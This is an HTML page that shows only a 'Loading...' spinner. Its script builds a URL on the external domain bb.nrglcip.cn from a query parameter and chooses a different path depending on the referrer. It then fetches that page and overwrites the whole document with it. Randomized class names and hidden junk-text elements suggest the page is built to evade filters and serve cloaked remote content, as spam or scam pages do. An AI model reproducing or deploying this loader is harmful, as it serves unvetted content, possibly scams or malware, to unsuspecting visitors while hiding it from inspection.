<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .h9IBRadS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .h9IBRadS .rz8NKsyr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .h9IBRadS .content {
            line-height: 50px;
            text-align: center
        }

        .h9IBRadS .img {
            width: 100%
        }

        .h9IBRadS .wExpWdOU0Lh {
            text-align: center
        }

        .h9IBRadS .wExpWdOU0Lh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .h9IBRadS .wExpWdOU0Lh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .h9IBRadS .wExpWdOU0Lh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .h9IBRadS .wExpWdOU0Lh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .h9IBRadS .wExpWdOU0Lh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .h9IBRadS .wExpWdOU0Lh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .h9IBRadS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Sl2231c1Qx(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var keERke = Sl2231c1Qx('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ keERke +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ keERke +".html?a=share";
		}
		
        tIIfE2YuB=url+"#"+new Date().getTime();
        tIIfE2YuB && function() {
            $.get(tIIfE2YuB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>Yj4MTDSfHBAE5Moue3k4LPnjk3KUbz5q1tPnSu10htBPfezksIfLIRocbvyaDxTs9rt50vpnNGzewChkjJ1KciS</div>
<img  src='' style='display:none'>
<ul style='display:none' >Qp56rFp3AynKsvmOTlfQIPyNDL14SvqWEVKftt</ul>
<img  src='' style='display:none'>
<ul style='display:none' >Qp56rFp3AynKsvmOTlfQIPyNDL14SvqWEVKftt</ul>
<h1 style='display:none' >I7z8IHvGnNcmT</h1>
<img  src='' style='display:none'>
<p  style='display:none'>iqii5hTNCF0XqH2cW9qvYlNlm21QeT0DgMB8D</p>
<h1 style='display:none' >I7z8IHvGnNcmT</h1>
<div style='display:none'>Yj4MTDSfHBAE5Moue3k4LPnjk3KUbz5q1tPnSu10htBPfezksIfLIRocbvyaDxTs9rt50vpnNGzewChkjJ1KciS</div><div class="h9IBRadS">
    <div class="rz8NKsyr">
        <div class="wExpWdOU0Lh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>ldvbpEiEC1mhXY</a>
<span style='display:none'>HJRbBqlDgoi1Hkr2SX5bTsjye0vi8hqTFHe7K6athK1xPbK4UGVaHYfWLDCpMb6R3eUjWJrKLNBFl</span>
<b style='display:none' >WNEbk9bF0qPpMU8Q0kEkaHHzm4gg3</b>
<span style='display:none'>HJRbBqlDgoi1Hkr2SX5bTsjye0vi8hqTFHe7K6athK1xPbK4UGVaHYfWLDCpMb6R3eUjWJrKLNBFl</span>
<img  src='' style='display:none'></body>
</html>